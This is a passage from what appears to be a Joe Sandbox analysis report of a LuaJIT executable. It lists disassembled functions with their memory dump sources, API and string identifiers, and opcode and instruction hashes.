                                                                                                                                                                        Function 00007FF738A5E430 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID: C$I$J$N
                                                                                                                                                                        • API String ID: 3168844106-327184588
                                                                                                                                                                        • Opcode ID: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                        • Instruction ID: 1a5b7d5844336dafd69dbde823a39f49e0d97ead2d92157a5abfccd6d5220f1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E313AB351D7818ADB60DB15E04062AFBA0F788B68F001226FBDE43B98CB7DD5419F18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFFCD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: "$cosh
                                                                                                                                                                        • API String ID: 1156100317-3800341493
                                                                                                                                                                        • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                        • Instruction ID: b00d82d540100a87e1d91a3d4a046ff06dbf2119aad8c3dd774e7ffc86bf1063
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                        • Instruction Fuzzy Hash: 45810632E28FC699D263AB30A4017B6F318BF5A3C5F509333D59E31A51DF3EA0829615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE0978 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                        • API String ID: 851805269-3733052814
                                                                                                                                                                        • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                        • Instruction ID: ce37741aa866586a25a82c7c4507c66efad4696a92981f3c3fb4181b38ca2caa
                                                                                                                                                                        • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                        • Instruction Fuzzy Hash: 1561B2339097829AEB20AF21D450769F7A0FB54B98F884536DA8C47795CF3DF490EB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A62AA0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: type_info::_name_internal_method
                                                                                                                                                                        • String ID: builtin#$false$nil$true
                                                                                                                                                                        • API String ID: 3713626258-3570738779
                                                                                                                                                                        • Opcode ID: b3ed43a0707a28e9115af90190efc957a42a7c81376a56ada5ae18f244965fa4
                                                                                                                                                                        • Instruction ID: f07cfca2f8301972de7290bf8b2c47ccf29055a7c8a9656e9e3ab4d7db7f48fc
                                                                                                                                                                        • Opcode Fuzzy Hash: b3ed43a0707a28e9115af90190efc957a42a7c81376a56ada5ae18f244965fa4
                                                                                                                                                                        • Instruction Fuzzy Hash: F661562361DA4595EA209B29E48052DF7A0F788BE4F904332EB9D877F8CF7DD1409B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A7B290 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                                                                                                                                        • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                                                                                                                                        • API String ID: 1341846612-1452030528
                                                                                                                                                                        • Opcode ID: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                                                                                                                                        • Instruction ID: d30cf107beed8213e31adee4e7346566bdd78dda84a6a4d3ef944f4348af5dda
                                                                                                                                                                        • Opcode Fuzzy Hash: 2243d252e4a85b275e312ea6a1b2425e11eba37f9292b294f5968ce13e20b1f3
                                                                                                                                                                        • Instruction Fuzzy Hash: BA318A23A1E55261F760B751D852BFAE390EFC4784FC00135E94E46A95DE3EE101A728
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A79610 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock_mbsncpy_s
                                                                                                                                                                        • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                                                                                                                                        • API String ID: 1937151238-4005544233
                                                                                                                                                                        • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                                                                                                                                        • Instruction ID: 61df30305856c33be7d089beb3b9e146b137e6ee3a2a55287dc95d2a94702171
                                                                                                                                                                        • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                                                                                                                                        • Instruction Fuzzy Hash: D9218362A1DA8291D620BB65E8415ABE351FBC43B4F901332F9AD477D9CEBED400EB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFAD68 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                        • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                                                                                                                                        • Instruction ID: e529b39f49ee231e6f44e521e9255f8e5f14ebf6a4c37a0c5c93c61211ff3583
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF03062A1A68BA2EB446B10D8847B5E360FF88B85F841035D54F455A5CF3DF448D329
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0FCD8 Relevance: 7.7, APIs: 5, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                        • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                                                                                                                                        • Instruction ID: 5cb52f84ecef105d5262d9aeef6bf779d2e54b9e91831814163b8f5d7a4d0d1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3651E853B08D8BA7E222BE34D800B76E251BF41394F948335E97E167D1DF3EA441A61B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0F880 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                        • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                                                                                                                                        • Instruction ID: f85a50659b4d04a0011071653d21f867e691fede2ebc27a60c65133abba473b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C115EA7F18A0767F6543164E442B79D5416F58360F840636E67E0A3D79F3EE840B12B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A78A50 Relevance: 7.5, APIs: 5, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 667068680-0
                                                                                                                                                                        • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                                                                                                                                        • Instruction ID: 67e3ef3cb7d84f0141dca548b1c1dc24dabd3c749e5c57a10053ae886cba6246
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                                                                                                                                        • Instruction Fuzzy Hash: E7011732509A8691DA60AB14F48472BE7B1FB88794F904135EA8D42A7CCF3EE554EB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0D7F8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                        • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                                                                                                                                        • Instruction ID: e727f6fa6d2c3bb088517f8a7f1176779d62be8aece44dd2fd44cd81d5e4807a
                                                                                                                                                                        • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                                                                                                                                        • Instruction Fuzzy Hash: 3281D4B3D0C243A9F7646A688944B38EB909F027C4FDD5235C629461D5CF3FA801B76B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE5C3C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                                                                                                                                        • Instruction ID: 79032cd126fc998d722e81b9ed757283787292e384ce12ccc219169df54de4a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                                                                                                                                        • Instruction Fuzzy Hash: C981937380E24696EB64BF25A04697CF7A0EB05B44F940837CA4946294EF3BF841E72D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE4E50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        • Opcode ID: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                                                                                                                                        • Instruction ID: 308ba86b2e4ac5eb632c4ca5b2969daf3c8259d4d444c305fd38c0d040d845d6
                                                                                                                                                                        • Opcode Fuzzy Hash: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                                                                                                                                        • Instruction Fuzzy Hash: AD81A33380E642DAEB64AE25D04497CF794EB02B44F980837DA4947285DF3FF981E769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE63E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        • Opcode ID: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                                                                                                                                        • Instruction ID: f5ac71050b3d86a691d6cb774dd0399c0cfbd9eff6f3ad2c99ece9ae65956801
